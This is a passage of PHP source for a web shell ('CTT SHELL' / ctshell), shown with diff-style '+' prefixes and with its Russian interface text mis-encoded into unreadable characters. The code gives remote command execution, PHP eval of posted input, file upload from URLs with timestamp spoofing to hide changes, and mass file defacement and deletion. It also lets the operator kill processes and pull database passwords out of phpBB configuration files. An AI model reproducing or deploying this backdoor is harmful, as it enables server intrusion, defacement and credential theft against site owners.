checked";} if ($perms[6] == "x") {$group_x = " checked";} + if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";} + if ($perms[9] == "x") {$world_x = " checked";} + echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'> +<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error> +<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error> +<table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br> +<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br> +<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br> +<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br> +<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br> +<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td> +<td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br> +<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br> +<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td> +</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"رîًُàيèٍü\"></td></tr></table></FORM></center>"; + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\","/",$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile[tmp_name])) + { +if (empty($uploadfilename)) {$destin = $uploadfile[name];} +else {$destin = $userfilename;} +if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "خّèلêà, çàمًَوà‏ùàے ôàéë ".$uploadfile[name]." (يه ىîوهٍ ٌêîïèًîâàٍü \"".$uploadfile[tmp_name]."\" يà \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { +if (!empty($uploadfilename)) {$destin = $uploadfilename;} +else +{ + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} +} +if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} +else +{ + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "حه ىîوهٍ çàمًَçèٍü ôàéë!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "خّèلêà, ïèَّùàے ôàéëَ ".htmlspecialchars($destin)."!<br>";} + else + { +fwrite($fp,$content,strlen($content)); +fclose($fp); +if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } +} + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>اàمًَçêà شàéëà:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\"> +ثîêàëüيûé ôàéë: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;èëè<br> +اàمًَçèٍü èç URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +رîًُàيèٍü ‎ٍîٍ ôàéëü â ïàïêَ: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +بىے شàéëà: <br><input name=uploadfilename size=25> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;تîيâهًٍèًîâàٍü èىے ôàéëà<br><br> +<input type=\"submit\" name=\"submit\" value=\"اàمًَçèٍü\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "حه ىîوهٍ َنàëèٍü ".htmlspecialchars($v)."<br>";} + if (!empty($delerr)) {echo "<b>سنàëهيèه ٌ îّèلêàىè:</b><br>".$delerr;} + } + $act = "ls"; +} +if ($act == "onedelete") +{ + $delerr = ""; + $result = false; + $result = fs_rmobj($f); + if (!$result) {$delerr .= "حه ىîوهٍ َنàëèٍü ".htmlspecialchars($f)."<br>";} + if (!empty($delerr)) {echo "<b>سنàëهيèه ٌ îّèلêàىè:</b><br>".$delerr;} + $act = "ls"; +} +if ($act == "onedeleted") +{ + $delerr = ""; + $result = false; + $result = fs_rmobj($d+'/'+$f); + if (!$result) {$delerr .= "حه ىîوهٍ َنàëèٍü ".htmlspecialchars($f)."<br>";} + if (!empty($delerr)) {echo "<b>سنàëهيèه ٌ îّèلêàىè:</b><br>".$delerr;} + $act = "ls"; +} +if ($act == "deface") +{ + $deferr = ""; + foreach ($actbox as $v) + { + $data = $deface_html; + if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);} + $data = str_replace("%%%filename%%%",basename($v),$data); + $data = str_replace("%%%filepath%%%",$v,$data); + $fp = @fopen($v,"w"); + fwrite($fp,$data); + fclose($fp); + if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";} + if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;} + } +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";} + if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";} + if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";} + + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_copy_obj($v,$d)) {$psterr .= "حه ىîوهٍ ٌêîïèًîâàٍü ".$v." to ".$to."!<br>";} +if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_move_obj($v,$d)) {$psterr .= "حه ىîوهٍ ïهًهىهٌٍèٍüٌے ".$v." to ".$to."!<br>";} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>دًèêëهèâàيèه ٌ îّèلêàىè:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + + if ($ext == ".tar.gz") + { +$cmdline = "tar cfzv"; + } + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { +$v = str_replace("\\","/",$v); +if (is_dir($v)) +{ + if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} + $v .= "*"; +} +$cmdline .= " ".$v; + } + $ret = `$cmdline`; + if (empty($ret)) {$arcerr .= "حه ىîوهٍ يàçâàٍü archivator!<br>";} + $ret = str_replace("\r\n","\n"); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { +if (in_array($v,$ret)) {fs_rmobj($v);} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_copy_obj($v,$d)) {$psterr .= "حه ىîوهٍ ٌêîïèًîâàٍü ".$v." to ".$to."!<br>";} +if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { +$to = $d.basename($v); +if (!fs_move_obj($v,$d)) {$psterr .= "حه ىîوهٍ ïهًهىهٌٍèٍüٌے ".$v." to ".$to."!<br>";} +unset($sess_data["cut"][$k]); + } + ct_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>دًèêëهèâàيèه ٌ îّèلêàىè:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { +while ($o = readdir($h)) {$list[] = $d.$o;} +closedir($h); + } + } + if (count($list) == 0) {echo "<center><b>حه ىîوهٍ îٍêًûٍü ٌïًàâî÷يèê (".htmlspecialchars($d).")!</b></center>";} + else + { + $tab = array(); + $amount = count($ld)+count($lf); + $vd = "f"; + if ($vd == "f") + { +$row = array(); +$row[] = "<b><center>بىے</b>"; +$row[] = "<b><center>ذàçىهً</center></b>"; +$row[] = "<b><center>بçىهيهي</center></b>"; +if (!$win) + {$row[] = "<b><center>آëàنهëهِ/أًَïïà</center></b>";} +$row[] = "<b><center>دًàâà</center></b>"; +$row[] = "<b><center>شَيêِèè</center></b>"; + +$k = $sort[0]; +if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} +if (empty($sort[1])) {$sort[1] = "d";} +if ($sort[1] != "a") +{ + $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>"; +} +else +{ + $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>"; +} + +$row[$k] .= $y; +for($i=0;$i<count($row)-1;$i++) +{ + if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";} +} + +$tab = array(); +$tab[cols] = array($row); +$tab[head] = array(); +$tab[dirs] = array(); +$tab[links] = array(); +$tab[files] = array(); + +foreach ($list as $v) +{ + $o = basename($v); + $dir = dirname($v); + + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + + $row = array(); + +if (is_dir($v)) + { + if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";} + else {$type = "DIR";} + $row[] = "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>"; + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>"; + $row[] = view_size(filesize($v)); + } + $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>"; + + if (!$win) + { + $ow = @posix_getpwuid(fileowner($v)); + $gr = @posix_getgrgid(filegroup($v)); + $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>"; + } + + if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";} + else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";} + + if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";} + else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";} + + if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} + elseif (is_link($v)) {$tab[links][] = $row;} + elseif (is_dir($v)) {$tab[dirs][] = $row;} + elseif (is_file($v)) {$tab[files][] = $row;} +} + } + $v = $sort[0]; + function tabsort($a, $b) + { +global $v; +return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v])); + } + usort($tab[dirs], "tabsort"); + usort($tab[files], "tabsort"); + if ($sort[1] == "a") + { +$tab[dirs] = array_reverse($tab[dirs]); +$tab[files] = array_reverse($tab[files]); + } + $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]); + echo "<TABLE class=table1 cellSpacing=0 cellPadding=0 width=100% border=0> +<form method=\"POST\">"; +$smsn=0; + foreach($table as $row) + { +$smsn++; + if ($smsn!=2 && $smsn!=3) { +echo "<tr>\r\n"; +foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";} +echo "</tr>\r\n"; +} + + } + echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0> +<tr class=tr2> +<td width=8% height=1%><font size=2 color=#000000> +دàïêè: ".(count($tab[dirs])+count($tab[links]))."</font></td> +<td width=8% height=1%><font size=2 color=#000000> شàéëû: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>"; +if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { +echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"آٌٍàâèٍü\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"دٌٍَîé لَôهً\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=\"act\"><option value=\"".$act."\">ر îٍîلًàييûى:</option>"; + echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">سنàëèٍü</option>"; + if ($usefsbuff) + { +echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">آûًàçàٍü</option>"; +echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">تîïèًîâàٍü</option>"; +echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">حهâûلًàٍü</option>"; + } + if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">حهâûلًàٍü</option>";} + echo "</select>&nbsp;<input type=\"submit\" value=\"دîنٍâهًنèٍü\">"; + echo "</form>"; + +echo "</td></tr></table>"; +echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>"; + } + +} +if ($act == "cmd") +{ + if (!empty($submit)) + { + echo "<b>ذهçَëüٍàٍ âûïîëيهيèے ‎ٍà êîىàينà</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { +ob_clean(); +myshellexec($cmd); +$ret = ob_get_contents(); +$ret = convert_cyr_string($ret,"d","w"); +ob_clean(); +echo $tmp; +if ($cmd_txt) +{ + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; +} +else {echo $ret;} + } + else + { +if ($cmd_txt) +{ + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + myshellexec($cmd); + echo "</textarea>"; +} +else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>تîىàينà âûïîëيهيèے:</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"آûïîëيèٍü\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +if ($act == "ps_aux") +{ + echo "<b>دًîِهٌٌû:</b><br>"; + if ($win) { +echo "<pre>"; +system('tasklist'); +echo "</pre>"; +} + else + { + if ($pid) + { +if (!$sig) {$sig = 9;} +echo "Sending signal ".$sig." to #".$pid."... "; +$ret = posix_kill($pid,$sig); +if ($ret) {echo "ok. he is dead, amen.";} +else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "Can't execute \"ps -aux\"!";} + else + { +$ret = htmlspecialchars($ret); +$ret = str_replace(""," ",$ret); +while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} +$prcs = explode("\n",$ret); +$head = explode(" ",$prcs[0]); +$head[] = "ACTION"; +unset($prcs[0]); +echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; +echo "<tr border=\"1\">"; +foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";} +echo "</tr>"; +foreach ($prcs as $line) +{ + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";} + echo "</tr>"; + } +} +echo "</table>"; + } + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>ذهçَëüٍàٍ âûïîëيهيèے ‎ٍîٍ PHP-êîن</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { +ob_clean(); +eval($eval); +$ret = ob_get_contents(); +$ret = convert_cyr_string($ret,"d","w"); +ob_clean(); +echo $tmp; +if ($eval_txt) +{ + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; +} +else {echo $ret;} + } + else + { +if ($eval_txt) +{ + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; +} +else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>PHP-êîن âûïîëيهيèے</b>"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"آûïîëيèٍü\"></form>"; +} +if ($act == "f") +{ + $r = @file_get_contents($d.$f); + if (!is_readable($d.$f) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) + { +if (in_array($ext,$v)) {$rft = $k; break;} + } + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + + echo "<b>ذàٌٌىîًٍهيèه ôàéëà:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + if (is_writable($d.$f)) {echo "<font color=\"green\">دîëيûé نîٌٍَï ÷ٍهيèے/çàïèٌè (".view_perms(fileperms($d.$f)).")</font>";} + else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";} + + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { +echo "<b>Information:</b>"; +echo "<table class=tab border=0 cellspacing=1 cellpadding=2>"; +echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>"; +echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; +if (!$win) +{ + echo "<tr class=tr><td><b>Owner/Group</b></td><td> "; + $tmp=posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." "; + $tmp=posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; +} +echo "<tr class=tr><td><b>Perms</b></td><td>"; + +if (is_writable($d.$f)) +{ + echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>"; +} +else +{ + echo "<font>".view_perms(fileperms($d.$f))."</font>"; +} + +echo "</td></tr>"; +echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>"; +echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>"; +echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>"; +echo "</table><br>"; + + +$fi = fopen($d.$f,"rb"); +if ($fi) +{ + if ($fullhexdump) + { + echo "<b>FULL HEXDUMP</b>"; + $str=fread($fi,filesize($d.$f)); + } + else + { + echo "<b>HEXDUMP PREVIEW</b>"; + $str=fread($fi,$hexdump_lines*$hexdump_rows); + } + $n=0; + $a0="00000000<br>"; + $a1=""; + $a2=""; + for ($i=0; $i<strlen($str); $i++) + { + $a1.=sprintf("%02X",ord($str[$i])).' '; + switch (ord($str[$i])) + { +case 0: $a2.="<font class=s2>0</font>"; break; +case 32: +case 10: +case 13: $a2.="&nbsp;"; break; +default: $a2.=htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { +$n = 0; +if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";} +$a1.="<br>"; +$a2.="<br>"; + } + } + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ". +"class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>". +"$a1</td><td bgcolor=000000>$a2</td></tr></table><br>"; +} +$encoded = ""; +if ($base64 == 1) +{ + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode($r); +} +elseif($base64 == 2) +{ + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode($r)); +} +elseif($base64 == 3) +{ + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode($r); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); +} +elseif($base64 == 4) +{ +} +if (!empty($encoded)) +{ + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; +} +echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { +if ($white) {@ob_clean();} +echo $r; +if ($white) {exit;} + } + elseif ($ft == "txt") + { +echo "<pre>".htmlspecialchars($r)."</pre>"; + } + elseif ($ft == "ini") + { +echo "<pre>"; +var_dump(parse_ini_file($d.$f,true)); +echo "</pre>"; + } + elseif ($ft == "phpsess") + { +echo "<pre>"; +$v = explode("|",$r); +echo $v[0]."<br>"; +var_dump(unserialize($v[1])); +echo "</pre>"; + } + elseif ($ft == "exe") + { +echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>"; + } + elseif ($ft == "sdb") + { +echo "<pre>"; +var_dump(unserialize(base64_decode($r))); +echo "</pre>"; + } + elseif ($ft == "code") + { +if (ereg("phpBB 2.(.*) auto-generated config file",$r)) +{ + $arr = explode(" +",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array( + "dbms"=>$dbms, + "dbhost"=>$dbhost, + "dbname"=>$dbname, + "dbuser"=>$dbuser, + "dbpasswd"=>$dbpasswd + ); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + + echo "</b>"; + echo "<hr size=\"1\" noshade>"; + } +} +echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">"; +if (!empty($white)) {@ob_clean();} +if ($rehtml) {$r = rehtmlspecialchars($r);} +$r = stripslashes($r); +$strip = false; +if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;} +$r = @highlight_string($r, TRUE); +if ($delspace) {$buffer = str_replace ("&nbsp;", " ", $r);} +echo $r; +if (!empty($white)) {exit;} +echo "</div>"; + } + elseif ($ft == "download") + { +@ob_clean(); +header("Content-type: ctshell"); +header("Content-disposition: attachment; filename=\"".$f."\";"); +echo($r); +exit; + } + elseif ($ft == "notepad") + { +@ob_clean(); +header("Content-type: text/plain"); +header("Content-disposition: attachment; filename=\"".$f.".txt\";"); +echo($r); +exit; + } + elseif ($ft == "img") + { +if (!$white) +{ + echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>"; +} +else +{ + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: image/gif"); + echo($r); + exit; +} + } + elseif ($ft == "edit") + { +if (!empty($submit)) +{ + if ($filestealth) {$stat = stat($d.$f);} + if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>رîًُàي¸يü!!!</b>"; + 